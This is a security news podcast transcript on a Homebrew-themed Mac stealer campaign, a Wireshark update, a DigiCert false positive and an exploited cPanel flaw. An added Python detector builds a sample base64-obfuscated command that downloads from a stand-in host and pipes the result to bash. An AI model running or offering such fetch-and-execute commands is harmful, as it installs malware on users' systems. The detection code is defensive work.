
SANS Stormcast Monday, May 4th, 2026: Malicious Homebrew Ads; Wireshark Update; Digicert False Positive; cPanel Exploited
Hello and welcome to the Monday, May 4, 2026 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich, recording today from Jacksonville, Florida, and this episode is brought to you by the SANS.edu Graduate Certificate Program in Industrial Control Systems Security. And in diaries today we got one of the excellent malware analysis diaries from Brad. Brad walks us here through an infection with MacSync Stealer. Now, what makes this particular attack so successful likely is that, well, it takes full advantage of the entire Google ecosystem. It starts out with a paid ad on Google. If you're searching for Homebrew, you may be seeing links for this particular malicious version of Homebrew, which is then also hosted within Google's Pages infrastructure. So the only URL you're seeing here is business.google.com, which of course is often not considered malicious. Now, if the user then clicks on this link, they're then being sent to a fake Homebrew page. Now, if you're not familiar with Homebrew, Homebrew is essentially a system that allows you to easily install various open source tools. So it's very commonly used by Mac users. And the page here looks very much like the real thing, only that this one of course is hosted within sites.google.com. Now, just like in the real Homebrew, you're then being asked to sort of copy-paste a shell script in order to execute the installer. Now, the real version is not obfuscated like the one here. Here you're then basically pasting a base64-encoded string that then leads to execution and will then download additional tools, including the malware in the end. Now, there are different warnings that you are probably getting. So definitely something that's not low friction, really.

But then again, it's still fairly easy for a victim to overlook this and go through with the install of this MacSync Stealer. As often, Brad has released all the packet captures and of course links to various tools and such that are being downloaded here on VirusTotal. The initial script is not well detected. It may get detected by this sort of new ClickFix fix that Apple has implemented. But of course that depends on how you're using your system. If you're routinely copy-pasting into the terminal, then this may not trigger here, since these tools are in particular for users that often use the terminal, and such is probably not going to get detected here on many systems. And then of course many of the malware pieces that are being downloaded here are hosted on, well, legitimate websites that are just compromised.

Well, and then we have a new version of Wireshark, 4.6.5. I usually don't sort of highlight new releases of Wireshark. They often do fix vulnerabilities. What's different about this release? Well, actually two things are sort of different here. Number one, this particular version does include fixes for vulnerabilities discovered recently by AI tools the developers used. So we have a total of 43 different vulnerabilities being addressed here. Some of these vulnerabilities may be exploitable for code execution, so definitely something that you want to take care of. Now, I usually don't like it when products release sort of a big security update like this and then they also make some changes sort of to the UI. In this particular case, I sort of actually understand that they changed the startup page a little bit and added sort of a more prominent ad for SharkFest, which is sort of a conference that the Wireshark people are running, and also a donation button. And I have to admit, I've been using Wireshark probably just sort of since it came out, like in the late '90s, definitely when it was still called Ethereal back in the day, and wasn't even aware that they were looking for donations. And it's such a useful tool, so if you're using it regularly, well, give them a little bit of money to support the development.

And this weekend there were multiple reports that Microsoft Defender for Endpoint did mark certain certificate authority certificates from DigiCert as malicious and removed them in some cases from systems. So these were pre-installed certificate authority certificates, and this was quickly dismissed sort of as a false positive, which it was. But there is a little bit more to the story that I just want to point out. So in this particular case, DigiCert did file a bug report with the certificate authority program. Now, a bug report here is really just meant sort of to communicate any issues with the certificate authority program. It's not necessarily sort of a classic bug. In this case it was actually a compromise of DigiCert. Some systems within DigiCert got compromised by malware, and 60 different certificates were issued by the malicious actor and subsequently then revoked. All of these certificates were signed by these certificate authority certificates that are now being here marked as malicious. It's likely more sort of a mistake here on Microsoft's end that they marked these sort of authority certificates as malicious, not the individual certificates. Again, the revocation, if it worked, should have taken care of these 60 certificates by now, hopefully. Anyway, even though the latest update here was just a couple days ago, actually a pretty good bug report, because an interesting compromise here in that some of the endpoint defenses that DigiCert here had in place had failed.

And for anybody running cPanel to manage their servers, be aware there is an already widely exploited vulnerability going around here compromising cPanel. Patches have been released, so please refer to the cpanel.net page for any details regarding the patch. cPanel, as far as I know, has an auto-update feature that should protect you here, but please double-check, since, yes, the exploit is widely available, so definitely it's one of those cases where you want to assume compromise if you have cPanel exposed. cPanel is particularly sort of problematic because it's often used by virtual hosting companies and such to provide customers access to servers. So a particular cPanel instance may have a large number of different websites behind it, and they are now all exposed due to this vulnerability. Well, and this is it for today, so thanks for listening, thanks for liking, thanks for subscribing, and as always, talk to you again tomorrow. Bye.
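The fake Homebrew page described in the first segment relies on the victim pasting a base64-encoded string into the terminal, whereas the genuine installer is a plain, readable one-liner. The following Python checker is an added example written for this page, not code from the ISC diary or from Brad's analysis: it takes a pasted install command (for example from clipboard history or a shell audit log) and flags the pattern the episode describes, base64-decoded data piped into an interpreter, and additionally decodes any base64-looking tokens to see whether the hidden payload itself downloads and executes further content. Both sample commands are constructed for the example; the obfuscated one decodes to a harmless placeholder that only points at the reserved `example.invalid` host.

```python
import base64
import re
import string

# Constructed samples for this example (not taken from the diary). The first has
# the shape of the genuine Homebrew installer one-liner; the second is a
# constructed stand-in for the obfuscated kind the episode describes, whose
# decoded content is a harmless placeholder pointing at a reserved hostname.
GENUINE_INSTALL = (
    '/bin/bash -c "$(curl -fsSL '
    'https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
)
OBFUSCATED_INSTALL = (
    "echo "
    + base64.b64encode(b"curl -fsSL http://example.invalid/installer.sh | sh").decode()
    + " | base64 -d | bash"
)

# Heuristics: a base64 decode step, an interpreter receiving piped input,
# base64-looking tokens, and download tools inside decoded content.
DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")
INTERPRETER_RE = re.compile(r"\b(?:sh|bash|zsh|python3?|perl|osascript)\b")
B64_TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")


def decoded_payloads(command):
    """Return the decoded text of every base64-looking token in the command.

    Tokens that are not valid base64, or that decode to non-printable bytes
    (URL path fragments occasionally look like base64), are skipped.
    """
    payloads = []
    for token in B64_TOKEN_RE.findall(command):
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        text = raw.decode("ascii", errors="replace")
        if any(ch not in string.printable for ch in text):
            continue
        payloads.append(text)
    return payloads


def assess(command):
    """Return a list of findings for one pasted command (empty means nothing flagged)."""
    findings = []
    stages = [s.strip() for s in command.split("|")]
    decodes = DECODE_RE.search(command) is not None
    # Only pipeline stages after the first can be receiving decoded data.
    feeds_interpreter = any(INTERPRETER_RE.search(s) for s in stages[1:])
    if decodes and feeds_interpreter:
        findings.append("base64-decoded data is piped into an interpreter")
    for payload in decoded_payloads(command):
        if FETCH_RE.search(payload):
            findings.append("decoded payload downloads further content: " + payload.strip())
        if "|" in payload and INTERPRETER_RE.search(payload):
            findings.append("decoded payload pipes a download into an interpreter")
    return findings


def classify(command):
    """Collapse the findings into a verdict: 'suspicious' or 'ok'."""
    return "suspicious" if assess(command) else "ok"


if __name__ == "__main__":
    for label, cmd in (("genuine", GENUINE_INSTALL), ("obfuscated", OBFUSCATED_INSTALL)):
        print(label, classify(cmd), assess(cmd))
```

The check deliberately does not treat `curl ... | bash` on its own as suspicious, since that is exactly what the real Homebrew installer looks like; what it keys on is the extra obfuscation layer that the genuine project never uses. It is a triage heuristic for reviewing clipboard or shell-history artifacts after the fact, not a replacement for the endpoint controls the episode mentions.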
Host: Johannes B. Ullrich
Podcast: SANS Internet Storm Center Daily Cyber Security Podcast
In this quick, information-dense episode, Johannes B. Ullrich delivers a rundown of the latest cybersecurity developments relevant to both security practitioners and sysadmins. The episode touches on multiple breaking issues, including a sophisticated Mac malware threat distributed through Google Ads, a critical Wireshark update, a false positive incident involving DigiCert certificates, and an actively exploited cPanel vulnerability.
[00:20] – [02:05] Malicious Homebrew ads (MacSync Stealer): attack vector, execution mechanism, detection and risks, resources
[02:06] – [03:07] Wireshark 4.6.5 update: what's new, personal note, recommendation
[03:08] – [04:07] DigiCert false positive: incident recap, background and details, security takeaway, quote
[04:08] – [05:05] cPanel exploited: vulnerability status, risks, action required, quote
This episode underscores the need for continual vigilance in the face of evolving threats—from stealthy ad-driven Mac malware to supply chain risks in certificate authorities and mass-targeted panel vulnerabilities. Johannes’ experienced yet practical tone offers both technical detail and actionable advice for frontline defenders.